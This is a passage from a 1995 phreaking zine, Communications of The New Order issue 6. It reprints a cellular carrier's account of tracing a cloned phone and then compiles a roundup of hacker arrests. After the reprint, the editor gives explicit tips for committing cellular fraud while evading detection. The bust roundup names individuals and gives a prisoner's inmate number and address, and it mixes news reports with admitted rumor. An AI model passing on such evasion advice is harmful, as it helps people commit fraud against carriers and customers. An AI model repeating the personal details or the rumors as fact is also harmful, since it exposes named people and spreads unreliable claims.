home *** CD-ROM | disk | FTP | other *** search
/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / zines / a_m / cotno6.txt < prev    next >
Encoding:
Text File  |  2003-06-11  |  165.8 KB  |  3,589 lines

  1.        ______         ______     _____________      ____      ___     ______
  2.       /  ____|\      /      \   /____    ____/\    /   | \  /   / |  /      \
  3.     /  /  ____\|   /   __    |\  \_/   /\____\/  /     |  /   /  / /   __    |\
  4.   /  /  /        /   /__/   / |  /   /  /      /   /|  |/   /  / /   /__/   / |
  5. /  /__/______   |         /  / /   /  /      /   /  |     /  /  |         /  /
  6. |____________|\ |\_____ /  / /__ /  /      /___/  / |___/  /    |\_____ /  /
  7. |_____________\| \|____| /   \__\ /       |___ |/   |___|/       \|____| /
  8.  
  9.                                    ____
  10.                                   /    \ ---
  11.                                 /        \   \ __
  12.                               /     /\     \   \  \
  13.                            _/______|_/    /   /   / \
  14.                           |          |  /   /   /  /
  15.                           |    ---\( |/   /   /  /
  16.                           |         \|\(/ \(/\(/
  17.                           |                   |
  18.                           /                  /
  19.                         /    \             /
  20.                       /         \     ___/
  21.                                      /
  22.                                    /
  23.                                  /
  24.  
  25.                       Communications of The New Order
  26.                                 Issue #6
  27.                                Fall 1995
  28.  
  29.  
  30.         "There is nothing more difficult to take in and, more perilous
  31.         to conduct, or more uncertain in its success, than to take the
  32.         lead in a new order of things."
  33.  
  34.                                         - Niccolo Machiavelli'
  35.  
  36.  
  37.          Cavalier........"I hacked codes to get warez for free drugs."
  38.          Dead Kat........"I have non-hacker friends but fuck if I keep in
  39.                           contact with them, they don't have k0d3z."
  40.          Disorder........"US West knew we were getting their stuff, they
  41.                           just didn't know we were on the deferred payment
  42.                           plan."
  43.          Edison.........."I said fuck you cop.. well I wish I had said that."
  44.  
  45.          Major..........."SUNOS... the swiss cheese of unix."
  46.          Voyager........."I don't think money is as powerful as fear, but
  47.                           I have a day job."
  48.  
  49.  
  50.  
  51.  
  52.          Special Thanks:  Gatsby, Mark Tabas, The Doktor, Presence,
  53.  
  54.          Demonika, Rage (303), Invalid Media, Deathstar, KevinTX,
  55.          Intrepid Traveler, Plexor, yLe, Drunkfux, Damien Thorne,
  56.          Brownstone, Storm Bringer, Neophyte, Ole Buzzard, AntiChrist,
  57.          Redboxchilipepper, El Jefe, Jupiter, Captain Hemp.
  58.  
  59.          Good Luck:  Mark Tabas, Gatsby, Kevin Crow, Dispater, St. Elmo,
  60.          Zibby, Dr. Delam, Phantom Phreaker, Purple Condom, Manson,
  61.          BernieS, Kevin Mitnick, Alphabits.
  62.  
  63.  
  64. <CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
  65.  
  66.  
  67.  
  68.                               __/\iNTRo/\__
  69.  
  70.  
  71. CoTNo is a 'zine of the computer underground of the 1990's.  It is written
  72. for H4Qu3r's and pHR3aCK3r's of intermediate to beginning experience.  All
  73. the information published herein is as accurate as possible and pertains to
  74. techniques and devices that actually work.  We do not publish any article
  75. that is not of an H/P nature.  If you wish to comment on or contribute to
  76. CoTNo, email one of us, or catch one of us on the iRC or try to catch
  77. us in your local Telco dumpster.
  78.  
  79. Ahem...
  80.  
  81. This issue is dedicated to all of our good friends who have recently been
  82. busted.  In fact, the last three issues are dedicated to them, since there
  83. have been more people busted in the last twelve months then at any time since
  84. Sundevil.  In issue four I espoused my opinion that there was a federal
  85. conspiracy at work with paid informants masquerading as our friends.  Last
  86. issue I gave detailed information on one of our own busted members, John
  87. Falcon.  In this issue there will be information you can use to help keep
  88. yourself out of jail.
  89.  
  90. In this issue, Disorder has compiled detailed information on the busts of
  91. lasts twelve months.  Each bust that we heard of is detailed with names and
  92. events.  Hindsight is always clearer than foresight, so hopefully you can
  93. learn from these busts how to avoid a similar fate.  Also in this issue, I
  94. am releasing confidential information on how cellular fraud is prevented.
  95. The information is straight from a national cellular carrier and details
  96. exactly how the telcos detect, trace, and bust cellular abuse.  This
  97. information should convince you to take the utmost precautions if you are
  98. experimenting with cellular technology.  Lastly, John Falcon sent me an
  99. article on what to do if you do get busted.  I think this is the first H/P
  100. article ever written from jail!
  101.  
  102. The following information was an actual article from Cellular One that was
  103. distributed to some of their employees.  This article was not edited in
  104. anyway, and contains the best information I have ever seen on how cellular
  105. fraud is prevented.  If you are participating in cellular phreaking, I
  106. recommend that you read this article very closely and take it as a warning
  107. from the Cellular Telephone industry.  They are getting serious about halting
  108. cellular fraud, and for good reason.  In New York for instance, often
  109. there are more fraudulent cellular calls than legitimate ones on any given
  110. day!  The Fedz are on their side too.  As you may already know, the Fedz ran
  111. an underground BBS for 8 months this year just to catch Cellular Fraudsters.
  112. In fact, Kevin Mitnick was recently busted using the same methods described
  113. in the following article.
  114.  
  115. The article, dated February 1995, follows:
  116.  
  117. A team of five Cellular One employees helped stop cellular fraud in Denver
  118. last week.  To protect both our employees and future investigations,
  119. Cellular One team members names will not be released.
  120.  
  121. California officials tracked a suspect from the Los Angeles area using a
  122. cloned cellular phone to Denver early last week and asked Cellular One for
  123. assistance in locating this suspect.  With the cloned cellular phone number
  124. and a number the suspect repeatedly called in California, the five Cellular
  125. One employees and both local and California law enforcement agents began
  126. tracking the whereabouts of the suspect through the pattern of his cellular
  127. phone calls.
  128.  
  129. Using AMA searches, RFCALL Trace, directional antennas, an IFR 1500, an
  130. RSAT Plus, and hours of labor, the Cellular One team identified the suspect's
  131. calling patterns.  An AMA search is a record of an individual cellular
  132. phone number's calls.  The cellular number is input along with the
  133. parameters for the search - start and finish date and time - and a log is
  134. printed which shows each individual call made by that cellular number.
  135. This tool is used generally within three days of the calls which you wish
  136. to observe.  AMA searches were compiled over several days to document the
  137. calling patterns of the suspect.
  138.  
  139. While the AMA searches show the past calling pattern, when attempting to
  140. capture a cellular fraud suspect, real time tools must also be used.  The
  141. Cellular One team used RFCALL Trace which tracks similar information as an
  142. AMA record with the exception that the information can be collected with
  143. only a 10 second delay from real time.  RFCALL Trace also tracks the
  144. individual radio in use, any handoffs, and the signal strength of
  145. the cellular call.  Law enforcement agents issued a subpoena to Cellular One
  146. for all information regarding the fraudulent cellular phone number's
  147. activity on our system.
  148.  
  149. Most of the fraudulent phone calls were being placed between 10am and
  150. midnight.  Tracking which cell sites, cell faces, and radios the suspect's
  151. calls set up on identified a small geographical area as the suspect's base of
  152. action.  Once an area had been established, one team member drove this area
  153. using an RSAT Plus, an IFR 1500, and a directional antenna (all basic
  154. cellular test equipment used in system optimization) to pinpoint the suspect's
  155. location to a specific apartment complex.  This team me tracked the calls
  156. made by the suspects's cellular number and, watching the faces serving the
  157. calls and he handoffs made by the system during the suspect's calls, he was
  158. able to narrow down the location from which the calls were made to a specific
  159. side of one apartment building.
  160.  
  161. The law enforcement agents, equipped with their own brand of cellular fraud-
  162. busting tools, asked if the Cellular One team could identify the actual
  163. apartment within the building where the calls were being placed.  A narrowband
  164. directional antenna was set to the transmit frequency of the cloned phone.
  165. One problem was that with each new phone call, the frequency being tracked
  166. changed.  The suspect made short calls, most around one minute, with the
  167. longest between three to five minutes.  Using the directional antenna
  168. and resetting the frequency with each new call on the cloned phone, the
  169. Cellular One employee identified a group of apartments within the building
  170. from which the cellular calls were being placed.
  171.  
  172. Unfortunately, the suspect slipped out of the building before the specific
  173. apartment was identified.  Again using RFCALL Trace, the Cellular One team
  174. logged the suspect's next phone call on a cell site near Stapleton
  175. Airport.  Law enforcement was notified and kept aware of the phone calls as
  176. the suspect traveled throughout the system.  It became evident that the
  177. suspect was moving back toward the apartment complex.  Surveillance
  178. officers outside the apartment noticed three men enter just moments before
  179. the Cellular One team notified them that a call had been placed from the
  180. apartment.  Within 20 minutes, the suspects again left the apartment.
  181. Denver Police began pursuit of the suspect and made the arrest.  Five
  182. additional cellular phones were found in the suspect's apartment.  It has
  183. not been determined if these phones are cloned.
  184.  
  185. Although cellular fraud exists, it is possible to catch the criminals.
  186. Congratulations to our fraud busters!  Cellular One asks that you keep this
  187. story confidential since the specifics of this and future investigations
  188. depend on our ability to catch the criminals in action.
  189.  
  190. End of Cellular One Article.
  191.  
  192. Pretty scary, huh?  Cellular phreaking used to be considered pretty safe, but
  193. times have changed.  The cellular phone companies are losing so much money on
  194. cellular fraud, that they have made busting the cellular hackers a priority.
  195. If you do commit cellular fraud, I suggest you use the following guidelines:
  196.  
  197. 1.  Never use the fraudulent ESN for over two weeks.
  198. 2.  Change ESN's as often as possible.
  199. 3.  Avoid creating a calling pattern with your fraudulent ESN.
  200. 4.  Avoid using the fraudulent ESN from a stationary location.
  201.  
  202. These tips could keep you out of jail!  Because you cannot divert with a
  203. cellular phone (unless you are Kevin Mitnick) these precautions are necessary.
  204. As my friend John Falcon told me, "Its not worth doing time for silly phone
  205. shit."  He's right.  H/P is fun, but anyone who has gotten busted will tell
  206. you the same.
  207.  
  208. But if despite these warnings, you still decide to cellular phreak, just make
  209. this quote from Gatsby your mantra, "An ESN a day, keeps the federals away."
  210.  
  211. |>ead|<at
  212.  
  213. -=(TNo)=-
  214.  
  215.  
  216.         Table of Contents
  217.         ~~~~~~~~~~~~~~~~~
  218.         Introduction......................................Dead Kat
  219.         Operation Phundevil...............................Disorder
  220.         What Happens When You Get Caught..................John Falcon
  221.         Legal and Technical Aspects of RF Monitoring......Major
  222.         The Tao of 1AESS..................................Dead Kat & Disorder
  223.         Frequently Visited AT&T Locations.................Major & Dead Kat
  224.         Remote Hacking in Unix............................Voyager
  225.         The Definity Audix VMS Inside Out.................Boba Fett
  226.         Bridging the Gap..................................Eddie Van Halen
  227.         Elite Music Part V................................Disk Jockey
  228.         Conclusion........................................Dead Kat
  229.  
  230.  
  231.  
  232.  
  233. <CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
  234.  
  235.  
  236.  
  237.                        -= Operation Phundevil =-
  238.  
  239.                            by DisordeR[TNo]
  240.  
  241.  
  242.         With all the busts happening in the past year, and a lack of
  243. information in the scene regarding who got busted when, and for what,
  244. I decided to put this article together. After working on this for a
  245. while, I realized that not only was it a little difficult in finding
  246. bust info, but half of the little you found was bullshit.
  247.  
  248.         The information in the following article is as accurate as I
  249. can find. With all the different accounts of what happened, different
  250. nicknames, different NPA's, and pure stupidity out there, don't bet your
  251. life on the information contained within this article.
  252.  
  253.         The following sections give you some details about some busts,
  254. and RUMORS of others. I indicate which are rumors and which are legit.
  255. I utilized everything from BBS posts, to newspaper articles, to word
  256. of mouth. Thanks to those who helped me on this. And by no means is this
  257. NEAR complete...
  258.  
  259. =-=
  260.  
  261. "OPERATION CYBERSNARE:  FEDZ = 1, PHREAKZ = 0"
  262.  
  263. Main Thugs:
  264.   Peter A. Cavicchia II -  Special Agent in Charge
  265.   Donna Krappa - Assistant U.S. Attorney in Newark
  266.   Stacey Bauerschmidt - "Carder One"
  267.  
  268. The Busted:
  269.   Richard Lacap - "Chillin" - Katy, Texas: Accused of conspiring to break
  270.      into the Portland, Oregon AT&T Wireless computers.
  271.   Kevin Watkins - "Led" - Houston, Texas:  Accused of conspiring to break
  272.      into the Portland, Oregon AT&T Wireless computers.
  273.      Watkins used the computer system of Embry Riddle University in
  274.      Prescott, Ariz., to enter the McCaw computer, Secret Service
  275.      Special Agent Stacey Bauerschmidt said in a sworn statement.
  276.   Jeremy Cushing - "Alpha Bits" - Huntington Beach, California: Accused
  277.       of trafficking in cloned cellular phones/equipment and stolen
  278.       access devices (ESN/MIN Pairs).
  279.   Frank Natoli - "Mmind" - Brooklyn, New York: Accused of trafficking in
  280.       stolen access devices.
  281.   Al Bradford - "Cellfone" - Detroit, Michigan: Accused of trafficking in
  282.       unauthorized access devices.
  283.   Michael Clarkson - "Barcode" - Brooklyn, New York: Accused of possessing
  284.       and trafficking in hardware used to obtain unauthorized access to
  285.       telecommunications services.
  286.  
  287. Penalty:
  288.         If convicted, defendants face maximum possible sentences ranging
  289. from 15 years for Cushing to 10 years for Bradford, Clarkson and
  290. Natoli and five years for Lacap and Watkins.
  291.  
  292. Details:
  293.         Starting in January, Stacey Bauerschmidt and other Secret Service
  294. agents in Newark, NJ, set up what is now called "an electronic chop shop"
  295. by the press. Stacey (in cooperation with a 'nameless informer' who will
  296. be mentioned later) set up a computer BBS called "Celco 51" with the
  297. intent of busting hackers and phreakers specializing in cellular phone
  298. fraud.
  299.         For the first sixth months, the board operated using MBBS with
  300. four nodes. At any given time the board had an 800 re-route (not really)
  301. so that the users could call without any problem (ANI). To the credit of
  302. the agents in charge, the board did not allow just anyone access. The sysop
  303. (PMF) appeared to discriminate and only allow the 'elite' members of the
  304. H/P community on. With the illusion of security, the agents running the
  305. board could successfully monitor the users, and begin to make deals with
  306. the hackers.
  307.         Stacey [Who went by 'Carder One'] continually asked members of the
  308. BBS if they were interested in selling ESN/MIN pairs [Used for cellular
  309. phone fraud]. These 'pairs' are considered 'illegal access devices' and
  310. are usually found in large enough amounts to consist of felonies. On top
  311. of the illegal access devices, Stacey was looking for people that were
  312. willing to sell illegal cloning equipment. This equipment consisted of
  313. devices used to get pairs, clone phones, and reprogram phones.
  314.         The operation was very successful in many ways, notably the ability
  315. of the agents to mask the true nature of the board. For over eight months,
  316. Stacey and other agents monitored the board looking for any chance to
  317. prosecute any of the members. The sysop (PMF) continuously advertised the
  318. board to the members, as well as mailed and HARASSED members into calling
  319. more than they wished to (Entrapment anyone?). PMF was responsible for
  320. mailing members up to three times a day, message flooding people on IRC,
  321. and using other methods of harassment to get hackers to call.
  322.         On top of the harassment, Carder One continuously asked for people
  323. to post 'pairs' as well as sell them in private. In a few cases, individuals
  324. would not have considered selling these pairs had the federal agents not
  325. harassed them so much. Ahem.
  326.  
  327.         "Cushing and five others were arrested in four states during a
  328. sweep last week by federal agents. Another 14 raids spread over eight
  329. states led to the confiscation of 31 computers, 65 illegally programmed
  330. phones and 14 "readers," devices used to illegally pluck cellular phone
  331. numbers and serial codes from cellular phone transmissions."
  332.         [Wonder who's computer will run the next sting board?]
  333.  
  334.         "But because the alleged crooks posted phone numbers on the bulletin
  335. board indicating where they could be reached, the Secret Service was able to
  336. trace the calls, leading to the arrests."
  337.         [Need we emphasize the importance of Diverting any more?]
  338.  
  339.         "But officials said this case represented the first time that the
  340. Secret Service had created an entirely new computer bulletin board..."
  341.         [Couldn't bust any warez kiddies recently...]
  342.  
  343. [Watch out kiddies... They are using more than 'questionable' methods
  344. of busting hackers and phreaks these days. If you haven't met someone,
  345. be careful of what you post on their systems.. many people thought
  346. PMF was cool until he NARKED on everyone that he could.]
  347.  
  348. =-=
  349.  
  350. "ANARCHIST BUSTED FOR WRITING MAGAZINE"
  351.  
  352. From: The Anarchives <tao@presence.lglobal.com>
  353.  
  354. In early march of 1995 I was arrested for "Unauthorized Use Of A Computer".
  355.  
  356. Three large, white, plain-clothes detectives from 52 division in downtown
  357. toronto came to my house, promptly arrested me, took me to a holding
  358. cell, and conducted a strip search (looking for codes I guess). I was
  359. held in custody for four hours (7:30 pm to 11:30 pm), and released as a
  360. result of substantial protest made by friends and family at the sergeants
  361. desk.
  362.  
  363. I was being accused of breaking into the computer systems at the
  364. University Of Toronto for the purpose of publishing "Anarchist
  365. newsletters".
  366.  
  367. The sysadmin of ecf.utoronto.ca, one Professor Jack Gorrie
  368. <gorrie@ecf.utoronto.ca>, saw someone on his system publishing Anarchist
  369. materials, assumed I was a malicious "hacker", turned over all records of
  370. my email, news posts, key strokes, you name it, to the police at 52
  371. division. The police realizing how dangerous these "hacker anarchist"
  372. types are, had to come to my house to cuff me, bring me down, and strip
  373. search me.
  374.  
  375. I was to face trial for a possible six months in prison, just for
  376. exercising my democratic rights and responsibilities.
  377.  
  378. Of course the end result was that the charges were dropped, although this
  379. was not until several months later (sept 7, 95), after several
  380. appearances in court, and after my agreeing to pay $400 to the skule.
  381.  
  382. =-=
  383.  
  384. "FEDS SAY HACKERS CRACKED INTO TOWER CREDIT CARD RECORDS"
  385. by, Denny Walsh
  386.  
  387. From: The Sacramento Bee
  388. Saturday Sept. 16, 1995
  389.  
  390.         Two talented Berkeley hackers were charged Friday with computer-
  391. age crimes against a Tower Video rental store in Sacramento, federal
  392. authorities said, in large part because they went up against Tower's even
  393. more talented electronic security corps.
  394.  
  395. When authorities raided their apartment last month, Terry Patrick Ewing,
  396. 21, and Michael Yu Kim, 20, had the credit card numbers of 2,000 Tower
  397. customers, federal prosecutors said.
  398.  
  399.         According to a federal grand jury indictment, Ewing and Kim used
  400. their personal computer to break into a system know as TRON, owned and
  401. operated by Tower's West Sacramento-based parent, MTS Inc.
  402.  
  403.         Kim and Ewing are charged in a three-count indictment with
  404. conspiracy, fraud and the unauthorized destruction of computer data.
  405.  
  406.         The prosecutor said the pair are not in custody and will be
  407. allowed to surrender next week. He said he does not see them as flight
  408. risks.
  409.  
  410. =-=
  411.  
  412. "KEVIN MITNICK BUST - HIGHLIGHTS"
  413.  
  414. From Multiple Sources
  415.  
  416. If you want more details, read the hundreds of articles about this story.
  417. Also, read the Phrack 47 editorial pertaining to this subject.
  418.  
  419. Kevin Mitnick (31)
  420. -One of the first indicted under Computer Security Act of 1987
  421. -Search began in November 1992
  422. -Mark Seiden (expert in firewalls) discovered that someone had obtained
  423.  all of Netcom's credit card numbers for 20,000 online subscribers.
  424. -Stole files from: Motorola, Apple, Netcom, and more.
  425. -Mitnick used the Well as a repository for files he stole from computer
  426.  security expert Tsutoma Shimomura.
  427. -After raping Tsutoma, he used Bruce Koball's account to transfer
  428.  proprietary software from Motorola, NEC, Nokia, Novatel, Oki, Qualcomm,
  429.  and other cell manufacturers.
  430. -Shimomura concluded that it was Mitnick, and that he was operating
  431.  through cellular, from Raleigh, NC
  432. -Mitnick was bouncing his calls through GTE Switches, local switches,
  433.  and a few types of cellular switches, and utilized Netcom's dialins.
  434. -Lived in Player's Court, a 12-unit apartment building in suburb of
  435.  Duraliegh Hills, three miles from the airport. He lived in Apt 202.
  436. -Until a week or two before he was arrested, FBI surveillance agents in
  437.  Los Angeles were certain that 'the intruder' was somewhere in Colorado.
  438. -FBI arrested him at 24 hour stakeout
  439. -Arrested in Raleigh, N.C. at 1:30 a.m.
  440.  
  441. =-=
  442.  
  443. "PHREAKS BUSTED IN NY... MORE TO COME"
  444.  
  445. "Ok all Listen up and listen good. resistance is down. Maybe permanently. Most
  446. of you prolly haven't heard yet, but there have been major busts going around.
  447. ... Today alone i found out that Neon Samurai, Tokien Entry, and Hellfire
  448. have been busted. ... that they even busted craig neidorf(knight lightnig)
  449. again.
  450.  
  451. More bad news. If you are on UPT(unphamiliar territory) or Cellco 51, stop
  452. calling. The SS who raided hellfire slipped a bit and bragged about being on
  453. those boards.
  454.  
  455. Hellfire said the feds were mostly interested in credit cards,
  456. VMB's, and Cell phones.
  457.  
  458. They are looking to bust for cellular, VMB's and credit cards...
  459.  
  460. Tokien entry i found out has been in jail for 2 days!
  461. Neon Samurai was busted for credit cards and also for telco equipment that
  462. the nynex people said was worth 50,000. "
  463.  
  464.  
  465. PMFs (Narc) reply:
  466.  
  467. "dude, this is utter shit and i expect u to post this reply for me seeing
  468. as i ain't on that bbs.. Hellfire gave up his accounts to UPT and my bbs
  469. among others, he was the only person busted and nothing to do with his
  470. busts was EVER mentioned on my board. He doesn't even get involved in
  471. cellphones, he was busted coz he and every other person busted used
  472. 1 800 CALL ATT from his house.. what a bunch of lamers... I don't even
  473. know who wrote that next but i would like to find out.. probably the guys
  474. from NYHE..."
  475. [Ironic isn't it!]
  476.  
  477. =-=
  478.  
  479. "ALPHABITS ORIGINAL BUST LAST YEAR"
  480.  
  481. Caught alphabits on irc lastnight and he said:
  482.  
  483. <alphabits> but I got sent to prison 7 months ago, and lost contact ***
  484.  
  485. According to different people, he was busted for check fraud and/or credit
  486. fraud and/or cellular fraud. Unfortunately, I will not be able to talk
  487. to him until after this article.
  488.  
  489. =-=
  490.  
  491. "SYNCOMM, MEMBER OF S.O.B (SERVANTS OF BABUSHKA) RAIDED"
  492.  
  493. From another group member:
  494.  
  495. Syncomm was talking on the phone.. the day before Master of Reality got
  496. busted... so MOR, Greg and equinox were sitting there chatting away when
  497. a load of federal agents <SS, FBI, 1 NSA guy and even a guy from customs>
  498. and some local police busted down his door. He dropped the phone and all
  499. they heard was a rustle of papers .. then a "Secure that paper!" then a
  500. click.. They put a shotgun to his head and said "Hello Syncomm". They
  501. said he was the leader of S.O.B. an international terrorist organization.
  502. Then again they thought that Crypt Keeper and MOR were also the sole
  503. leader of SOB ... So then they put a knee to his back and handcuffed him
  504. <Greg, 16, apparently posed a serious threat>. They proceeded to
  505. interrogate.. and at one point this one agent <female> tried to seduce him
  506. into talking <I think he would of he she did more .. ;)> ..
  507.  
  508. He was finaly was lead outside when his neighbor walked up to them and
  509. handed them all of Greg's notes, etc.. that greg had asked him to stash..
  510. Greg then threatened his neighbors life.. <which he came back to do
  511. unhandcuffed afterwards> and was led off to holding... were they produced
  512. "A big fucking printout" that apparently detailed Greg's activities.. they
  513. nailed him for hacking UC and then accused him of crashing their
  514. systems.. Along with criminal tools <his computer> and some other
  515. offenses.. <one of which I am sure of is Wire Fraud.. they love that>
  516.  
  517. =-=
  518.  
  519. "FBI REVEALS ARREST IN MAJOR CD-ROM PIRACY CASE"
  520.  
  521. SOFTWARE CRACKDOWN - Two Canadians were arrested in a blitz
  522. that has software companies upset to see piracy extending
  523. into the CD-ROM format.
  524.  
  525. From the Associated Press, Saturday Dec 24 1994
  526.  
  527. BUFFALO, New York - The FBI has arrested a Canadian father and son in what
  528. is believed to be the first major case of CD-ROM piracy in the United States.
  529.  
  530. Agents said Thursday they seized 15,000 counterfeit copies of the popular
  531. CD Rom games  REBEL ASSAULT and MYST that were being sold at 25% of retail
  532. value.
  533.  
  534. PETER MISKO, 63, of Mississauga, Ontario, and his son, BRUCE MISKO, 36, of
  535. CHICAGO were arrested in Buffalo and charged with felony copyright infringe-
  536. ment.  The counterfeit goods were recovered in a Niagara Country warehouse
  537. authorities said.
  538.  
  539. The FBI told the Los Angeles Times that additional warrants were served in
  540. INDIANA and NEW HAMPSHIRE as part of a crackdown on retail stores selling
  541. the illegal software.  MORE ARRESTS ARE EXPECTED.
  542.  
  543. =-=
  544.  
  545. "MULTI-COUNTRY EFFORT CRACKS COMPUTER RING"
  546.  
  547. TORONTO -  Canadian, US and European investigators
  548. have cracked a ring of computer hackers who allegedly
  549. stole about $5 million US$ by breaking into the
  550. computers of phone companies and other firms.
  551.  
  552. The 12 hackers who met over the Internet, used coding
  553. and call switching to conceal the transfer of funds,
  554. codes and communications.
  555.  
  556. RUDY LOMBARDI, 22, of MISSISSAUGA Ontario PLEADED
  557. GUILTY on Tuesday, June 27 1995.  He got 90 days in
  558. Jail and 100 hours of community services for HELPING
  559. the RCMP with their investigation - instead of at least
  560. a one year jail sentence.
  561.  
  562. =-=
  563.  
  564. "RUMORS FROM 914"
  565.  
  566. There has been a huge chain of busts in 914. Apparently, GANGSTER,
  567. who ran a board in 914 called 'Bamboozie Dimension' was busted. Rumor
  568. goes on to say that he was 'fucking around with CC's' which led to the
  569. bust.
  570.  
  571. =-=
  572.  
  573. "WAREZ BUSTS IN 510"
  574.  
  575. The Sewer Line BBS in 510 met trouble on December 11th due to the
  576. distribution of console warez (from various posts). Rumor also has it,
  577. that a user on the board going by ROCK'N was in fact a sega representative,
  578. and narked on the sysop for his activities.
  579.  
  580. =-=
  581.  
  582. "214 BUSTS"
  583.  
  584. During August of '94, several boards (mostly warez/ansi affiliated)
  585. were raided by the FBI. The busts occurred in the Dallas/Ft. Worth
  586. area, the list follows:
  587.           Agents of Fortune [409] (Sysop: Butcher [LEGEND])
  588.           Suburbia          [214] (Sysop: The Chairman [RZR],
  589.           The Network       [214] (Sysop: Masterblaster)
  590.           The Depths        [214] (Sysop: Maelstrom ex-[RZR/iCE])
  591.           Elm Street        [214] (Sysop: Freddy Krueger)
  592.           User to User      [214] (Sysop: William Pendergast)
  593.  
  594. =-=
  595.  
  596. "PHILLY 2600 MEETING"
  597.  
  598. From recent posts and word of mouth, the Philadelphia 2600 meetings are
  599. having a hard time making it past 5 minutes. Apparently, local police in
  600. coordination with mall rent-a-cops [joining of forces there], are kicking
  601. hackers and phreakers out of their meeting place based on charges of
  602. loitering and conspiracy [to do what?! Assemble?]. Currently, police
  603. are threatening to break up meetings, and/or jail participants for the
  604. two reasons cited above.
  605.  
  606. =-=
  607.  
  608. "FEDZ BUST KID IN MINNESOTA"
  609.  
  610. November '94, a 15 year old in Minnesota had a pleasant visit by
  611. federal agents. According to newspaper articles, the boy [unnamed
  612. in the article] was basing his hacks out of the Detroit Free-Net.
  613. "He used passwords to gain access to more than 10 computer networks
  614. from Detroit to Moscow". During his time on the Detroit Free-Net,
  615. he was said to have maliciously disabled enough of the system 'forcing'
  616. it to shut down.
  617.    Currently, the boy is facing potential charges for using
  618. telecommunications devices to cross state lines, and felony charges
  619. for breaking into computer systems.
  620.  
  621.    Other favorite quotes from the articles about this case:
  622.    "...hospitalized, possibly for psychological reasons, when police
  623.     confiscated his computer modem and software programs Monday."
  624.  
  625.    "...said the boy appeared to fit the typical hacker profile: a
  626.     15- to 20-year-old male, many who have low self-esteem. 'He really
  627.     could use a girlfriend instead of a computer' Grewe said."
  628.  
  629. =-=
  630.  
  631. "THE TROUBLES OF BERNIE S."
  632.  
  633. Recently, a lot of press has been covering the story of 'Bernie S'.
  634. You can find more info about his bust on alt.2600 as well as several
  635. 'hacker' mailing lists. Here are some of the interesting quotes from
  636. one of those articles:
  637.  
  638.    "Ed Cummings, also known to many in cyberspace as Bernie SS was arrested
  639. on March 13th, 1995 for 2 misdemeanors of possession, manufacture and sale
  640. of a device to commit Telecommunications fraud charges. He is being held in
  641. Delaware County Prison in lieu of $100,000.00 Bail."
  642.    His arrest took place at a local 7-11 where *15* police cars pulled
  643. into the parking lot. During the interaction with the officer, he told
  644. them 'no, you can't search my car', yet minutes later, he noticed
  645. an officer going through the contents of his car. Despite his protests,
  646. the officer removed several timing crystals, tone dialers, and a 'broken
  647. red box'.
  648.    The following day, Bernie was at a friend's house when '8 to 10' plain
  649. clothed armed men burst into the house yelling 'freeze'. Minutes later
  650. he was being taken to jail in cuffs. He was not formally charged until
  651. his arraignment where his bail was set to 100,000 dollars because he
  652. refused to talk with the police without counsel present.
  653.    "The Judge dropped the two unlawful use of a computer charges due to
  654. the fact that the evidence was circumstantial and the county had no actual
  655. evidence that Ed had ever used the computers in question. As of 3/27/1995
  656. Ed Cummings is still in Delaware County Prison awaiting his trial."
  657.  
  658. =-=
  659.  
  660. "RUSSIANS ARREST 6 IN COMPUTER THEFTS"
  661.  
  662. This article was taken from the Associated Press, Saturday Dec 24 1994
  663.  
  664. St. Petersburg, Russia, Sept 26 (AP) -- Russian police
  665. officers have arrested six more people in a $10 million
  666. computer theft from Citibank here, but the masterminds are
  667. said to remain at large.
  668.  
  669. Several people have been arrested abroad and face charges
  670. in the United States, including Vladimir Levin, 28,
  671. reportedly the group's computer hacker.
  672.  
  673. Citibank officials said they recovered all but $400,000 and
  674. upgraded the cash-management systems's electronic security
  675. after the theft.
  676.  
  677.  
  678. FT, Sept 21, 1995.
  679.  
  680. Extradition in Citibank hacking case
  681.  
  682. A British court yesterday approved the extradition to the
  683. US of Mr Vladimir Levin, the Russian science graduate
  684. accused of an attempted $10m (6.5m pounds) computer hacking
  685. fraud on Citibank. ...
  686.  
  687. =-=
  688.  
  689. "PURPLE CONDOM CAUSES TROUBLE"
  690.  
  691. Purpcon recently had pleasant meetings with his Dean where he attends
  692. college after getting caught rewriting his magnetic student ID, so
  693. that others would get charged for his meal. :)
  694.  
  695. =-=
  696.  
  697. "CoTNo RUMORS"
  698.  
  699. In past issues of CoTNo we have always said 'good luck to' people
  700. that have been busted (or said to have been busted)..
  701.  
  702. Deathstar, AntiChrist (school admins?), Coaxial Mayhem,
  703. Maestro (Blueboxing?), Lucifer (still in jail?), Grappler (hacking),
  704. Jimbo (MCI Calling Card Fraud), Maelstrom, and Datastream Cowboy (hello
  705. CIA spooks), Merc, Crypt Keeper (keep reading), 602 crowd, and the 513 crowd.
  706.  
  707. At the request of some of the above, I can't go into details on their busts.
  708.  
  709. =-=
  710.  
  711. "JOHN FALCON BUSTS"
  712.  
  713. Since rumors about his bust have been running rampant on the 'Net',
  714. here are the facts about the bust... for more info, and JF's reply
  715. to the rumors, read CoTNo 5.
  716.  
  717. Common myths of my arrest:
  718.  
  719. 1 - The FBI/NSA cracked my hard drive and read all my encrypted mail.
  720. 2 - Mr. Falcon left his secring.pgp on his system.
  721. 3 - FBI/NSA read the RSA encrypted data.
  722. 4 - My conviction was because I was a hacker.
  723.  
  724. Let me go over my conviction:
  725.  
  726. Count 1: Theft of Government Property - How they caught me: Narc
  727. Count 2: Fraudulent use of an Access Device - How they caught me: Narc
  728. Count 3: Fraudulent use of a Computer - How they caught me: questionable
  729. Count 4: Fraudulent use of an Access Device - How they caught me: Narc
  730.  
  731. If you would like to get in contact with JF, here is his info:
  732. email:  jfalcon@ice_bbs.alaska.net
  733. snailmail:  Don Fanning
  734.             #12617-006
  735.             3600 Guard Road
  736.             Lompoc, CA  93436
  737.  
  738.  
  739. =-=
  740.  
  741. "EPSILON, DAMIEN, SHOCKWAVE (303)"
  742.  
  743. From CoTNo 3 (Read there for full story)
  744.  
  745. Three Colorado teen-agers are suspected of setting up an elaborate computer-
  746. hacking system that tapped into a long-distance telephone company and stole
  747. secret access codes (k0dez!).
  748.  
  749. Police arrested Kevin Wilson (Damian), 18, of the 7400 block of South Gallup
  750. Street in Littleton, and two juveniles (Epsilon and Shockwave) from Jefferson
  751. County in the alleged scheme.
  752.  
  753. =-=
